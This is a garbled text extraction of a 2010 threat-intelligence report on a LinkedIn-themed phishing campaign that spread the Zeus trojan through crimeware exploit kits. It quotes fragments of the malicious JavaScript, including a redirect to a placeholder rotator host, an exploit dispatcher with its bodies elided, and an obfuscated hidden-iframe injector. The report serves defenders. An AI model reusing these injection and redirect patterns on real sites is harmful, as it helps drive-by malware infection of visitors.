daedalusfocus-linkedin-prf5 (1)
TRANSCRIPT
-
8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)
1/7ISSUE DATE: 22 OCTOBER 2010
LARGE-SCALE MALICIOUS
LINKEDIN PHISHING CAMPAIGN
-
8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)
2/7
Page 02
Copyright and DisclaimerThis report is Entity X, 2010. Where it has not been possible to locate the original copyright owner
of photographs and other non Entity X content we tender our apologies to any owner whose rights may
have been unwittingly infringed. The links to external websites included in this report are for ease of
reference only and Entity X takes no responsibility for the content presented.
THE DAEDALUS REPORT SERIESThe Entity X Daedalus series of reports informs clients of emerging trends and
developments in the areas of cyber threats, net-centric security and electronic
attack, authored by respected experts on the subject. The main monthly
Daedalus Report provides comprehensive analysis of notable emerging issues;
Daedalus Focus reports are issued as developments occur, providing technical
detail and code samples when appropriate; Daedalus Special reports are issued
to certain government clients only, highlighting sensitive matters relating to
exploitation opportunities. All Daedalus subscribers are invited to request
subjects to be covered in our Focus and Special reports, and provide feedbackon any of our products.
ContributorsRobi Sen, Analysis Director, Entity X
ABOUT ENTITY X
but now it affects every aspect of our lives, our work and our government.
and net-centric warfare. Were a team of highly experienced IT professionals
we seek to develop in our clients a greater and deeper understanding of the
range of disparate yet rapidly evolving threats that governments, businesses and
individuals face. Entity X Inc produces the Daedalus report series to inform and
brief our clients and we also provide consultancy and training in this specialized
LARGE-SCALE MALICIOUS
LINKEDIN PHISHING CAMPAIGN
http://mail.google.com/support/bin/answer.py?hl=en&answer=180707http://mail.google.com/support/bin/answer.py?hl=en&answer=180707 -
8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)
3/7
Page 3
LARGE-SCALE MALICIOUS LINKEDIN
PHISHING CAMPAIGN
Report OverviewA malicious phishing campaign themed on the LinkedIn networking website has been
underway since the last week of September and through early October. The campaignshows a higher than usual degree of sophistication on the part of the phishers and although
the phishing emails all use well-crafted LinkedIn-style templates intended to trick the user
into following a link to a website that will attempt to exploit their browser to install a Zeus
trojan, the actual exploits are being auto-generated by crimeware tools. Furthermore,
the phishers have changed the crimeware tools they use multiple times, perhaps in an
attempt to keep building momentum for their campaign. This could be a trend in phishing
and malware attacks where malicious hackers and criminal networks use crimeware to
accelerate and keep changing their campaigns in order to reduce the ability of email
providers, ISPs, and similar, to ameliorate their campaigns.
SUMMARY
Large-scale and changing LinkedIn themed phishing attack underway from late
September into October
Attack tactic involves changing the means used to exploit targets
Phishing campaign developers making large-scale use of various crimeware tools to
attempt to install Zeus trojans
Attack demonstrates more sophisticated, persistent, and adaptable phishing
campaign than usual perhaps because of use of crimeware tools that enable rapid
setup and development of malware attacks
LinkedIn-Themed Phishing EmailRecently a more sophisticated than usual phishing campaign has been targeting users
professional social networking site LinkedIn. Although the threat from the campaign is not
particularly high it shows an increasing sophistication in phishing tactics, an increase in the
use of crimeware1 tools, and an increase in the targeting of social networks. An example of
one of the phishing emails can be seen in Fig. 1 as it appeared in Googles Gmail. One of
people have been tricked into believing this is a genuine LinkedIn email.
1 By crimeware toolkits we mean software specially written for criminals that make the generation of viruses, trojans, malware-
infected websites, spam/phishing campaigns, and even command and control of botnets simple GUI-based operations.
-
8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)
4/7
Page 4
Fig. 1: A LinkedIn
phishing email as it
appeared Gmail
AnalysisClicking on the Visit your InBox now link redirects the user to a website (see Code
Listing 1 below) which initially redirects the user to a website that attempts to exploit their
machine via javascript created by the SEO Sploitkit.
if (navigator.javaEnabled())
{
var metka = 2;
}
location.href = (http://someaddress.info/asdfasgs/rotator.php?unique= + metka + );if (!frames.navigator[taintE + nabled]())
{
var metka = 1;
}
location.href = (http://someaddres.info/asdfasgs/rotator.php?unique= + metka + );
Code Listing 1: Simple JavaScript that redirects the user, depending on if it can perform
a data tainting attack
if none of them works the user is simply redirected to Google. The javascript is actually
Windows Help and Support, and Adobes Acrobat Reader via a PDF. For an example see
Code Listing 2 and Code Listing 3 below.
http://www.ipolicynetworks.com/technology/files/Seo_Analysis.htmlhttp://www.ipolicynetworks.com/technology/files/Seo_Analysis.html -
8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)
5/7
Page 5
function PDF()
{ .. }
function arbt()
{ .. }
function JAVABOF()
{ .. }function MkM720Jny()
{ .. }
function JAVASGB()
{ .. }
function JAVASMB()
{ .. }
if (PDF() || arbt() || MkM720Jny() || JAVASMB() || JAVASGB() || JAVABOF() )
{
}
setTimeout(function ()
{
REDIRECT()
}
, 7000);
function redir()
{
window.location=http://google.com;
}
function REDIRECT()
{
setTimeout(redir();
, 1000);
}
Code Listing 2: SEO Sploit generated JavaScript that calls six different functions each of which
tries to install the Zeus trojan
Xbwd72ue1rb = 25-(12*2);
var Jztblyv7l = document.createElement(div);
Jztblyv7l.id = Gtjpqcdqt9jlbp;
document.body.appendChild(Jztblyv7l);
Yej6pkmusdgjp = Xbwd72ue1rb;
Qb0inb27krky = document.createElement(i)@f&!r())a !#&m)&e@)).replace(/$|#|&|\ |\
(|\)|@|\!/ig, ));
Qb0inb27krky.src = Rioso4oplcgzzhd8;
Qb0inb27krky.height = Xbwd72ue1rb;
Qb0inb27krky.width = Xbwd72ue1rb;
document.getElementById(Gtjpqcdqt9jlbp).appendChild(Qb0inb27krky);
return 0;
}
Code Listing 3:
-
8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)
6/7
Page 6
If any of these exploits work then the users computer will be infected with the Zeus trojan.
a period of a few days, appeared to change the crimeware kit they used two times. The
Phoenix toolkit. Then within
a number of days the perpetrator started another mass-emailing usingthe Crimepack
toolkit, each time using slightly different exploits but in general always to push trojans
that would turn an exploited users computer into a zombie for a botnet like Zeus. This isimportant in that it shows how crimeware allows even technically unsophisticated criminal
groups to rapidly change their attack campaigns.
Fortunately most of the major anti-virus and malware companies keep up with crimeware
However, many users do not keep their anti-virus programs up to date and are therefore
putting themselves at risk from such phishing attacks. Furthermore, it also seems that variants
of this same phishing campaign targeted Apple OSX users, infecting them with the Zeus
trojan. This is interesting in that while OSX has been attacked and has numerous viruses,
Apple operating systems have largely been ignored by phishing attacks using malware to infectuser systems, suggesting that malware campaigns will increasingly attack Apple products.
Avoiding Phishing Campaigns
1 Authenticate senders
2 Look for obvious signs of phishing
3 Do not click on links
4 Be careful when opening attachments, regardless of sender
applications up to date
Phishing attacks depend on the fact that most computer users practise poor internet
hygiene, are not aware of threats, and are too busy or distracted to pay attention to the
content of their emails. Almost all but the most sophisticated of phishing attacks can be
avoided by following some very simple steps:
1 Authenticating senders: Always turn on view email headers in your email program.
Gmail, offer an equivalent.2 Look for obvious signs of phishing: Look for bogus email addresses, link addresses
that do not match the sender, poorly spelled or grammatically incorrect content, or
simply out-of-context requests. For an example see Fig. 2.
3 Do not click on links: For example, in the case of this LinkedIn campaign instead of
clicking on the Visit your InBox now users would be protected by going directly to the
LinkedIn website and checking their messages from there.
http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html#googtrans%28es%7Cen%29http://www.offensivecomputing.net/?q=node/1572http://mail.google.com/support/bin/answer.py?hl=en&answer=180707http://mail.google.com/support/bin/answer.py?hl=en&answer=180707http://www.offensivecomputing.net/?q=node/1572http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html#googtrans%28es%7Cen%29 -
8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1)
7/7
Page 7
4 Be careful when opening attachments, regardless of sender: Unless you are
authenticity of their email.
up to date:
but most malware threats take advantage of security holes in browsers, applications,
users not keeping their systems up to date.
Fig. 2: LinkedIn
phishing email from 1
October 2010. When
viewed in Microsoft
Outlook with view
headers turned onthe email address
can be immediately
while mousing over a
link shows it pointing
to a suspect URL
Fake address
Phishing link
IMPLICATIONS
Security professionals: Spam and phishing will continue to be major issues,
with training users on how to protect themselves from this threat being the major
means to stop it.
Intelligence professionals: Intelligence professionals should note that it would
be a short step from theming LinkedIn phishing emails to actually setting up a
campaign that targets intelligence professionals who use LinkedIn themselves. There
is a surprisingly high number of law enforcement, defence, security, and intelligence
employees who use LinkedIn who could be susceptible to targeted phishing attacks.